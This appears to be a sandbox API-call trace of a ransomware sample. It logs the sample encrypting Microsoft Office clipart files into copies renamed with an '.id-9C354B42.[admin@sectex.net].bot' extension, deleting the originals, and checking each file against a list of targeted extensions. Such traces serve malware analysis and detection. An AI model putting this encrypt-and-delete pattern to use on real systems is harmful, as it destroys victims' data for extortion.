	[0140.459] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xbb80, lpOverlapped=0x0) returned 1
	[0140.461] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.461] WriteFile (in: hFile=0x38c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.461] SetEndOfFile (hFile=0x38c) returned 1
	[0140.461] CloseHandle (hObject=0x38c) returned 1
	[0140.461] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.461] SetEndOfFile (hFile=0x388) returned 1
	[0140.494] CloseHandle (hObject=0x388) returned 1
	[0140.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 1
	[0140.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".doc") returned 4
	[0140.896] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString=".docx") returned 5
	[0140.896] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.896] lstrlenW (lpString=".pdf") returned 4
	[0140.896] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString=".xls") returned 4
	[0140.896] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.896] lstrlenW (lpString=".xlsx") returned 5
	[0140.896] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.896] lstrlenW (lpString=".ppt") returned 4
	[0140.896] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".zip") returned 4
	[0140.896] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.896] lstrlenW (lpString=".rar") returned 4
	[0140.896] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString=".bz2") returned 4
	[0140.896] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString=".7z") returned 3
	[0140.896] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".dbf") returned 4
	[0140.896] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".1cd") returned 4
	[0140.896] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".jpg") returned 4
	[0140.896] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.896] lstrlenW (lpString=".doc") returned 4
	[0140.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString=".docx") returned 5
	[0140.897] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.897] lstrlenW (lpString=".pdf") returned 4
	[0140.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString=".xls") returned 4
	[0140.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.897] lstrlenW (lpString=".xlsx") returned 5
	[0140.897] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.897] lstrlenW (lpString=".ppt") returned 4
	[0140.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.897] lstrlenW (lpString=".zip") returned 4
	[0140.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.897] lstrlenW (lpString=".rar") returned 4
	[0140.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString=".bz2") returned 4
	[0140.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString=".7z") returned 3
	[0140.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.897] lstrlenW (lpString=".dbf") returned 4
	[0140.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.897] lstrlenW (lpString=".1cd") returned 4
	[0140.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63
	[0140.897] lstrlenW (lpString=".jpg") returned 4
	[0140.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.897] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0140.898] lstrlenW (lpString="BD19563_.GIF") returned 12
	[0140.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.915] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=20454) returned 1
	[0140.915] CloseHandle (hObject=0x3a0) returned 1
	[0140.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 0x20
	[0140.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.917] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.917] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0141.166] GetLastError () returned 0x0
	[0141.166] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4fe6, lpOverlapped=0x0) returned 1
	[0141.168] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4ff0, lpOverlapped=0x0) returned 1
	[0141.169] ReadFile (in: hFile=0x38c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.169] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.169] SetEndOfFile (hFile=0x3bc) returned 1
	[0141.170] CloseHandle (hObject=0x3bc) returned 1
	[0141.170] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.170] SetEndOfFile (hFile=0x38c) returned 1
	[0141.172] CloseHandle (hObject=0x38c) returned 1
	[0141.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 1
	[0141.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.187] lstrlenW (lpString=".doc") returned 4
	[0141.187] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.187] lstrlenW (lpString=".docx") returned 5
	[0141.187] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.187] lstrlenW (lpString=".pdf") returned 4
	[0141.187] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.187] lstrlenW (lpString=".xls") returned 4
	[0141.187] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.187] lstrlenW (lpString=".xlsx") returned 5
	[0141.187] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.187] lstrlenW (lpString=".ppt") returned 4
	[0141.187] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.187] lstrlenW (lpString=".zip") returned 4
	[0141.187] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.187] lstrlenW (lpString=".rar") returned 4
	[0141.187] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.187] lstrlenW (lpString=".bz2") returned 4
	[0141.187] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.187] lstrlenW (lpString=".7z") returned 3
	[0141.187] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.187] lstrlenW (lpString=".dbf") returned 4
	[0141.187] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.187] lstrlenW (lpString=".1cd") returned 4
	[0141.188] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString=".jpg") returned 4
	[0141.188] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString=".doc") returned 4
	[0141.188] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.188] lstrlenW (lpString=".docx") returned 5
	[0141.188] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.188] lstrlenW (lpString=".pdf") returned 4
	[0141.188] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString=".xls") returned 4
	[0141.188] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString=".xlsx") returned 5
	[0141.188] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.188] lstrlenW (lpString=".ppt") returned 4
	[0141.188] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString=".zip") returned 4
	[0141.188] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString=".rar") returned 4
	[0141.188] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.188] lstrlenW (lpString=".bz2") returned 4
	[0141.188] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.188] lstrlenW (lpString=".7z") returned 3
	[0141.188] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString=".dbf") returned 4
	[0141.188] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.188] lstrlenW (lpString=".1cd") returned 4
	[0141.188] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63
	[0141.189] lstrlenW (lpString=".jpg") returned 4
	[0141.189] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.189] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.189] lstrlenW (lpString="BL00045_.WMF") returned 12
	[0141.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.242] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7862) returned 1
	[0141.242] CloseHandle (hObject=0x3a4) returned 1
	[0141.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf")) returned 0x20
	[0141.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.431] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.431] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.433] GetLastError () returned 0x0
	[0141.433] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1eb6, lpOverlapped=0x0) returned 1
	[0141.462] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1ec0, lpOverlapped=0x0) returned 1
	[0141.463] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.463] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.463] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.480] CloseHandle (hObject=0x3a0) returned 1
	[0141.480] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.480] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.483] CloseHandle (hObject=0x3ac) returned 1
	[0141.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf")) returned 1
	[0141.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.523] lstrlenW (lpString=".doc") returned 4
	[0141.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.523] lstrlenW (lpString=".docx") returned 5
	[0141.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.523] lstrlenW (lpString=".pdf") returned 4
	[0141.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.523] lstrlenW (lpString=".xls") returned 4
	[0141.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.523] lstrlenW (lpString=".xlsx") returned 5
	[0141.523] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.523] lstrlenW (lpString=".ppt") returned 4
	[0141.523] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.523] lstrlenW (lpString=".zip") returned 4
	[0141.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.524] lstrlenW (lpString=".rar") returned 4
	[0141.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString=".bz2") returned 4
	[0141.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString=".7z") returned 3
	[0141.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString=".dbf") returned 4
	[0141.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString=".1cd") returned 4
	[0141.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString=".jpg") returned 4
	[0141.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString=".doc") returned 4
	[0141.524] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString=".docx") returned 5
	[0141.524] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.524] lstrlenW (lpString=".pdf") returned 4
	[0141.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString=".xls") returned 4
	[0141.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.524] lstrlenW (lpString=".xlsx") returned 5
	[0141.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.524] lstrlenW (lpString=".ppt") returned 4
	[0141.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.524] lstrlenW (lpString=".zip") returned 4
	[0141.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.524] lstrlenW (lpString=".rar") returned 4
	[0141.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.525] lstrlenW (lpString=".bz2") returned 4
	[0141.525] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.525] lstrlenW (lpString=".7z") returned 3
	[0141.525] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.525] lstrlenW (lpString=".dbf") returned 4
	[0141.525] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.525] lstrlenW (lpString=".1cd") returned 4
	[0141.525] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63
	[0141.525] lstrlenW (lpString=".jpg") returned 4
	[0141.525] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.525] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.525] lstrlenW (lpString="BL00194_.WMF") returned 12
	[0141.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.525] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3986) returned 1
	[0141.526] CloseHandle (hObject=0x3ac) returned 1
	[0141.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf")) returned 0x20
	[0141.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.526] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.526] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0141.527] GetLastError () returned 0x0
	[0141.527] ReadFile (in: hFile=0x3ac, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xf92, lpOverlapped=0x0) returned 1
	[0141.531] WriteFile (in: hFile=0x3a0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xfa0, lpOverlapped=0x0) returned 1
